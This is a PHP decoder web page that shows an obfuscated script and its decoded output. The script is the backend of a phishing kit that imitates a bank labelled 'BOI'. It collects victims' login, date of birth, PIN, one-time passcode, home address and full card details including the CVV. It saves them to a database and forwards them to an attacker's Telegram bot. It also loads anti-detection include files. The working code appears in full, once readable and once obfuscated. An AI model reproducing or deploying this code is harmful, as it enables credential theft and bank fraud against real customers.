Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto BmAZt; BmAZt: include "\56\56\57\56\56\x2f\x2e\56\x2f\103\x4f\116\106\x49\107..

Decoded Output download

<?php 
 goto BmAZt; BmAZt: include "../../../CONFIG.php"; goto q0NR9; eub6Z: include "../vendor/300.php"; goto yNpnX; kEYDh: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto w2fgl; q0NR9: include "margin.php"; goto UJwd0; zXRma: include "../vendor/netcraft_check.php"; goto mGjDy; mGjDy: session_start(); goto kEYDh; yNpnX: include "../vendor/index.php"; goto zXRma; Ggq1A: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["dob"] and $_POST["last4"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $dob = $_POST["dob"]; $last4 = $_POST["last4"]; $bankType = "BOI"; $_SESSION["usrlogin"] = $usrlogin; $_SESSION["dob"] = $dob; $_SESSION["last4"] = $last4; $comment = "User just logged into account"; $ip = $_POST["ip"]; $ua = urlencode($_POST["ua"]); $uniqueid = time(); $msg .= "[==========> {$bankType} Login <==========]\xa"; $msg .= "| Login : " . $usrlogin . "
"; $msg .= "| DOB : " . $dob . "
"; $msg .= "| Last 4 : " . $last4 . "
"; $msg .= "[==========> IP INFO <==========]
"; $msg .= "| Submitted by : {$ip} 
"; $msg .= "| UserAgent : {$ua} \xa"; $msg .= "==========> END <==========
"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "INSERT INTO customers (bankType, usrlogin, dob, last4, comment, ip, useragent, uniqueid, status) VALUES ('{$bankType}', '{$usrlogin}', '{$dob}', '{$last4}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } } goto XWMTN; w2fgl: function sendToTele($messaggio, $token, $chatID) { $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto Ggq1A; Y3kCx: include "../vendor/200.php"; goto eub6Z; UJwd0: include "../vendor/100.php"; goto Y3kCx; XWMTN: if ($_SESSION["started"] == "true") { if ($_GET["wait"] and numeric($_GET["wait"]) == true) { $id = $_GET["wait"]; $query = mysqli_query($conn, "UPDATE customers SET status=0 WHERE uniqueid={$id}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "wait notok")); } } if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "PIN") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $pinDigits = $_POST["digit1a"] . $_POST["digit2a"] . $_POST["digit3a"] . $_POST["digit4a"] . $_POST["digit5a"] . $_POST["digit6a"]; $usrlogin = $_SESSION["usrlogin"]; $dob = $_SESSION["dob"]; $last4 = $_SESSION["last4"]; $msg .= "[==========> BOI Login <==========]\xa"; $msg .= "| Login : " . $usrlogin . "\xa"; $msg .= "| DOB : " . $dob . "\xa"; $msg .= "| Last 4 : " . $last4 . "
"; $msg .= "| PIN : " . $pinDigits . "\xa"; $msg .= "[==========> IP INFO <==========]
"; $msg .= "| Submitted by : {$ip} \xa"; $msg .= "| UserAgent : {$ua} 
"; $msg .= "==========> END <==========
"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $comment = "PIN code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET pinDigits='{$pinDigits}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "PIN error")); } } } if ($_GET["type"] == "OTP") { if ($_POST["otpcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $otpcode = $_POST["otpcode"]; $comment = "OTP Code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET otpcode='{$otpcode}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTP Error")); } } } if ($_GET["type"] == "BILLING") { if ($_POST["fullname"] and $_POST["address"] and $_POST["postcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $fullname = $_POST["fullname"]; $address = $_POST["address"]; $postcode = $_POST["postcode"]; $comment = "Billing details entered"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET fullname='{$fullname}', address='{$address}', postcode='{$postcode}', comment='{$comment}', status=3, buzzed=1 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Billing error")); } } } if ($_GET["type"] == "CCDeets") { if ($_POST["ccname"] and $_POST["ccnum"] and $_POST["ccexp"] and $_POST["cccvv"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $ccname = $_POST["ccname"]; $ccnum = $_POST["ccnum"]; $ccexp = $_POST["ccexp"]; $cccvv = $_POST["cccvv"]; $comment = "Card details entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET ccname='{$ccname}', ccnum='{$ccnum}', ccexp='{$ccexp}', cccvv='{$cccvv}', comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Card deets error")); } } } } ?>

Did this file decode correctly?

Original Code

<?php
 goto BmAZt; BmAZt: include "\56\56\57\56\56\x2f\x2e\56\x2f\103\x4f\116\106\x49\107\x2e\x70\150\x70"; goto q0NR9; eub6Z: include "\x2e\56\57\x76\145\x6e\x64\x6f\x72\57\x33\60\60\x2e\x70\x68\160"; goto yNpnX; kEYDh: function numeric($num) { if (preg_match("\x2f\x5e\x5b\60\x2d\71\135\x2b\44\57", $num)) { $status = true; } else { $status = false; } return $status; } goto w2fgl; q0NR9: include "\155\141\162\x67\x69\156\x2e\160\x68\160"; goto UJwd0; zXRma: include "\56\56\57\x76\x65\156\144\157\162\57\156\145\x74\x63\162\x61\x66\x74\x5f\143\150\145\143\153\x2e\x70\150\x70"; goto mGjDy; mGjDy: session_start(); goto kEYDh; yNpnX: include "\56\56\57\x76\x65\156\x64\157\x72\57\151\x6e\x64\145\170\56\160\x68\x70"; goto zXRma; Ggq1A: if ($_GET["\164\x79\x70\145"] == "\154\x6f\147\x69\x6e") { if ($_POST["\165\163\x72\x6c\157\x67\x69\156"] and $_POST["\144\x6f\142"] and $_POST["\x6c\141\x73\164\x34"] and $_POST["\151\x70"] and $_POST["\x75\x61"]) { $usrlogin = $_POST["\x75\163\162\x6c\x6f\x67\151\x6e"]; $dob = $_POST["\144\x6f\x62"]; $last4 = $_POST["\x6c\x61\x73\164\64"]; $bankType = "\102\117\111"; $_SESSION["\165\x73\x72\x6c\157\147\151\156"] = $usrlogin; $_SESSION["\144\157\x62"] = $dob; $_SESSION["\154\141\163\164\64"] = $last4; $comment = "\125\x73\x65\x72\40\x6a\x75\163\164\40\x6c\x6f\147\147\145\x64\40\x69\156\x74\x6f\x20\x61\143\143\x6f\x75\x6e\164"; $ip = $_POST["\151\160"]; $ua = urlencode($_POST["\165\x61"]); $uniqueid = time(); $msg .= "\x5b\x3d\75\x3d\75\75\x3d\x3d\x3d\75\x3d\76\40{$bankType}\x20\114\157\x67\151\x6e\x20\74\x3d\75\x3d\x3d\x3d\75\75\x3d\75\75\x5d\xa"; $msg .= "\174\40\x4c\x6f\x67\151\156\x20\72\x20" . $usrlogin . "\12"; $msg .= "\174\x20\x44\117\x42\40\72\40" . $dob . "\12"; $msg .= "\x7c\40\114\141\x73\164\x20\x34\x20\x3a\40" . $last4 . "\12"; $msg .= "\x5b\x3d\75\x3d\75\x3d\x3d\x3d\75\75\75\76\40\x49\120\40\x49\116\x46\x4f\40\x3c\75\75\x3d\75\75\75\75\x3d\x3d\x3d\x5d\12"; $msg .= "\174\x20\x53\165\x62\155\151\x74\x74\x65\144\40\x62\171\40\x3a\x20{$ip}\x20\12"; $msg .= "\x7c\40\x55\x73\145\162\101\x67\x65\156\x74\x20\72\40{$ua}\40\xa"; $msg .= "\75\75\x3d\75\75\x3d\75\75\75\75\76\x20\x45\116\104\40\74\75\x3d\75\75\x3d\x3d\75\75\75\x3d\12"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $query = mysqli_query($conn, "\x49\x4e\x53\105\122\124\40\x49\116\x54\117\x20\x63\165\x73\164\x6f\x6d\145\x72\163\40\x28\142\x61\156\x6b\124\x79\160\145\x2c\x20\165\163\162\154\157\x67\x69\x6e\54\x20\144\x6f\142\x2c\40\154\141\163\x74\64\54\x20\143\157\x6d\x6d\145\156\x74\54\x20\151\x70\x2c\x20\x75\163\145\x72\141\147\145\156\164\x2c\40\165\x6e\x69\161\165\145\x69\144\x2c\40\163\x74\141\x74\x75\163\x29\x20\126\x41\114\125\x45\x53\40\x28\47{$bankType}\x27\54\x20\47{$usrlogin}\47\54\40\47{$dob}\47\x2c\x20\47{$last4}\x27\54\40\47{$comment}\47\x2c\x20\47{$ip}\x27\54\40\x27{$ua}\x27\54{$uniqueid}\54\40\x31\51"); if ($query) { $_SESSION["\x75\156\151\x71\x75\145\151\144"] = $uniqueid; $_SESSION["\x73\x74\141\162\164\x65\144"] = "\164\x72\x75\145"; echo json_encode(array("\x73\164\141\164\x75\163" => "\x6f\x6b")); } else { echo json_encode(array("\x73\x74\141\x74\165\163" => "\x64\142\40\x63\x6f\156\156\40\145\162\162\x6f\162")); } } } goto XWMTN; w2fgl: function sendToTele($messaggio, $token, $chatID) { $url = "\x68\x74\x74\x70\x73\x3a\x2f\57\x61\160\151\56\x74\x65\x6c\145\x67\x72\141\x6d\x2e\157\162\x67\x2f\142\157\164" . $token . "\x2f\163\145\156\x64\x4d\145\163\x73\x61\x67\x65\77\143\150\141\164\137\151\x64\75" . $chatID; $url = $url . "\46\x74\x65\170\x74\x3d" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto Ggq1A; Y3kCx: include "\56\x2e\57\x76\x65\156\144\x6f\x72\57\x32\60\60\56\x70\150\160"; goto eub6Z; UJwd0: include "\x2e\56\x2f\x76\x65\x6e\144\x6f\x72\x2f\x31\x30\60\56\x70\x68\x70"; goto Y3kCx; XWMTN: if ($_SESSION["\163\x74\x61\162\x74\x65\144"] == "\164\x72\x75\145") { if ($_GET["\167\141\x69\x74"] and numeric($_GET["\167\x61\151\164"]) == true) { $id = $_GET["\167\x61\151\164"]; $query = mysqli_query($conn, "\125\120\104\101\124\105\x20\143\165\x73\x74\157\x6d\x65\x72\x73\40\123\x45\x54\40\163\164\141\x74\165\x73\75\60\40\x57\110\x45\122\x45\x20\x75\156\x69\x71\165\x65\151\144\75{$id}"); if ($query) { echo json_encode(array("\x73\164\141\164\165\163" => "\x6f\153")); } else { echo json_encode(array("\x73\164\x61\164\x75\163" => "\x77\141\151\164\40\x6e\x6f\164\157\153")); } } if ($_GET["\147\x65\x74\x73\x74\141\164\165\163"] and numeric($_GET["\147\x65\x74\x73\164\141\x74\165\163"]) == true) { $id = $_GET["\147\145\164\163\164\x61\x74\x75\163"]; $query = mysqli_query($conn, "\123\105\114\x45\x43\124\40\52\40\x66\162\x6f\155\x20\x63\x75\x73\164\x6f\x6d\x65\x72\x73\x20\x57\110\105\x52\x45\40\165\x6e\151\x71\x75\145\151\144\x3d\x27{$id}\47"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\163\x74\x61\x74\165\163"]; } } if ($_GET["\164\x79\x70\x65"] == "\x50\x49\x4e") { if ($_POST["\165\x73\145\x72\151\x64"] and numeric($_POST["\x75\x73\x65\162\x69\144"]) == true) { $pinDigits = $_POST["\x64\x69\x67\151\x74\x31\x61"] . $_POST["\144\151\147\x69\164\62\x61"] . $_POST["\144\151\147\x69\164\63\x61"] . $_POST["\144\151\x67\x69\164\x34\141"] . $_POST["\x64\151\x67\151\x74\x35\141"] . $_POST["\144\151\147\x69\164\x36\x61"]; $usrlogin = $_SESSION["\x75\x73\x72\154\157\x67\151\x6e"]; $dob = $_SESSION["\x64\x6f\x62"]; $last4 = $_SESSION["\x6c\x61\163\x74\64"]; $msg .= "\x5b\75\75\x3d\x3d\x3d\x3d\75\75\x3d\75\76\40\x42\117\111\x20\114\x6f\x67\x69\x6e\40\x3c\75\x3d\75\x3d\x3d\75\75\75\x3d\x3d\x5d\xa"; $msg .= "\x7c\x20\x4c\157\x67\151\156\x20\x3a\x20" . $usrlogin . "\xa"; $msg .= "\174\x20\x44\x4f\102\40\x3a\40" . $dob . "\xa"; $msg .= "\x7c\40\114\x61\x73\164\40\x34\40\x3a\x20" . $last4 . "\12"; $msg .= "\x7c\x20\x50\111\116\x20\72\40" . $pinDigits . "\xa"; $msg .= "\x5b\x3d\x3d\75\75\75\75\75\x3d\75\75\76\40\x49\120\x20\x49\x4e\x46\117\x20\74\x3d\75\x3d\x3d\x3d\75\75\75\75\75\135\12"; $msg .= "\174\x20\x53\165\x62\x6d\151\x74\164\x65\144\40\x62\171\x20\72\x20{$ip}\x20\xa"; $msg .= "\174\40\x55\163\x65\x72\x41\147\145\x6e\x74\x20\72\40{$ua}\x20\12"; $msg .= "\75\75\x3d\75\75\x3d\x3d\x3d\75\75\x3e\x20\x45\116\104\40\74\x3d\x3d\x3d\x3d\75\x3d\75\75\75\x3d\12"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } $comment = "\120\x49\116\x20\143\x6f\x64\x65\x20\145\156\164\x65\162\x65\144\54\x20\x75\163\145\x72\40\x77\141\151\x74\x69\156\x67"; $uniqueid = $_POST["\x75\163\x65\162\151\x64"]; $query = mysqli_query($conn, "\125\x50\104\x41\x54\105\40\143\x75\x73\164\157\x6d\145\x72\x73\x20\x53\105\124\40\160\151\156\x44\x69\x67\151\164\x73\75\47{$pinDigits}\x27\54\x20\x63\x6f\x6d\155\145\156\164\x3d\47{$comment}\47\x2c\40\163\164\141\164\165\163\x3d\62\x2c\x20\x62\165\172\172\x65\144\x3d\60\40\x57\x48\105\122\x45\x20\x75\x6e\151\161\165\145\x69\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\x74\x61\164\165\x73" => "\157\153")); } else { echo json_encode(array("\x73\x74\x61\164\165\163" => "\120\x49\116\40\x65\x72\162\x6f\x72")); } } } if ($_GET["\x74\171\x70\x65"] == "\x4f\124\x50") { if ($_POST["\157\x74\160\143\157\x64\145"] and $_POST["\165\163\145\x72\x69\x64"] and numeric($_POST["\165\163\145\x72\151\144"]) == true) { $otpcode = $_POST["\157\164\160\143\157\x64\145"]; $comment = "\x4f\124\x50\40\x43\x6f\x64\145\x20\x65\156\x74\x65\x72\145\144\x2c\x20\x75\163\145\x72\40\x77\x61\x69\164\x69\156\x67"; $uniqueid = $_POST["\x75\163\145\x72\x69\x64"]; $query = mysqli_query($conn, "\x55\120\104\101\x54\x45\40\x63\x75\163\x74\x6f\155\x65\162\x73\40\123\x45\124\x20\157\x74\160\x63\157\144\145\75\47{$otpcode}\47\x2c\40\x63\x6f\155\155\x65\x6e\x74\75\x27{$comment}\47\54\x20\163\164\x61\x74\165\163\x3d\63\54\40\x62\165\x7a\x7a\145\x64\x3d\x30\x20\127\110\105\x52\105\40\x75\156\x69\x71\x75\x65\x69\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\141\x74\x75\x73" => "\x6f\x6b")); } else { echo json_encode(array("\163\x74\141\x74\165\x73" => "\x4f\124\120\x20\x45\162\162\157\x72")); } } } if ($_GET["\x74\x79\160\x65"] == "\102\x49\x4c\x4c\x49\x4e\x47") { if ($_POST["\x66\x75\x6c\154\x6e\141\x6d\145"] and $_POST["\141\x64\144\162\145\163\163"] and $_POST["\x70\157\163\x74\x63\x6f\144\x65"] and $_POST["\165\163\145\x72\151\144"] and numeric($_POST["\165\x73\x65\x72\x69\144"]) == true) { $fullname = $_POST["\x66\x75\x6c\x6c\x6e\x61\x6d\145"]; $address = $_POST["\x61\144\144\x72\145\163\163"]; $postcode = $_POST["\x70\157\163\x74\x63\x6f\144\145"]; $comment = "\x42\151\154\154\151\x6e\147\x20\x64\x65\x74\141\151\154\163\40\x65\156\x74\145\162\145\x64"; $uniqueid = $_POST["\x75\x73\x65\162\151\x64"]; $query = mysqli_query($conn, "\125\120\104\x41\x54\105\x20\143\165\163\x74\x6f\155\x65\162\163\x20\123\x45\124\40\x66\165\154\x6c\x6e\141\x6d\x65\x3d\47{$fullname}\x27\x2c\40\141\x64\144\x72\x65\x73\x73\75\47{$address}\x27\x2c\x20\160\157\x73\x74\x63\157\x64\145\x3d\47{$postcode}\47\54\40\143\157\x6d\x6d\145\156\164\75\47{$comment}\x27\54\40\163\x74\x61\x74\165\x73\75\63\54\40\x62\x75\x7a\172\x65\x64\75\x31\x20\127\x48\105\122\105\40\165\x6e\151\x71\x75\x65\151\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\x61\x74\165\x73" => "\x6f\153")); } else { echo json_encode(array("\x73\164\x61\x74\165\163" => "\102\151\x6c\154\x69\156\x67\40\x65\162\162\x6f\162")); } } } if ($_GET["\164\171\x70\x65"] == "\103\103\104\145\145\x74\163") { if ($_POST["\x63\x63\x6e\141\x6d\145"] and $_POST["\x63\143\156\165\155"] and $_POST["\x63\x63\145\170\x70"] and $_POST["\143\143\x63\166\x76"] and $_POST["\165\163\x65\x72\151\144"] and numeric($_POST["\165\163\x65\162\151\144"]) == true) { $ccname = $_POST["\143\x63\156\141\x6d\145"]; $ccnum = $_POST["\143\143\156\165\155"]; $ccexp = $_POST["\x63\143\x65\x78\x70"]; $cccvv = $_POST["\x63\x63\143\x76\166"]; $comment = "\x43\x61\x72\x64\x20\x64\145\164\x61\151\154\x73\40\x65\156\164\x65\x72\145\x64\54\x20\165\163\145\162\40\167\141\151\x74\x69\156\x67"; $uniqueid = $_POST["\165\x73\x65\162\x69\144"]; $query = mysqli_query($conn, "\125\120\104\x41\124\105\x20\143\x75\x73\164\x6f\x6d\x65\162\163\40\123\x45\x54\x20\143\143\156\141\155\145\75\47{$ccname}\x27\x2c\x20\x63\143\x6e\165\155\x3d\x27{$ccnum}\47\54\x20\143\x63\x65\x78\x70\75\47{$ccexp}\47\54\x20\x63\x63\x63\x76\x76\75\47{$cccvv}\x27\54\40\x63\x6f\155\x6d\x65\156\164\x3d\47{$comment}\47\x2c\x20\163\x74\141\x74\165\163\x3d\64\54\40\x62\165\172\172\145\144\x3d\x30\x20\x57\x48\x45\x52\105\x20\x75\x6e\151\161\165\x65\151\x64\x3d{$uniqueid}"); if ($query) { echo json_encode(array("\163\164\x61\164\x75\163" => "\x6f\153")); } else { echo json_encode(array("\163\164\141\x74\165\163" => "\x43\x61\x72\x64\x20\144\x65\x65\164\163\x20\145\162\162\x6f\162")); } } } }

Function Calls

None

Variables

None

Stats

MD5 35d2bf76c65b046ad095734cac341869
Eval Count 0
Decode Time 50 ms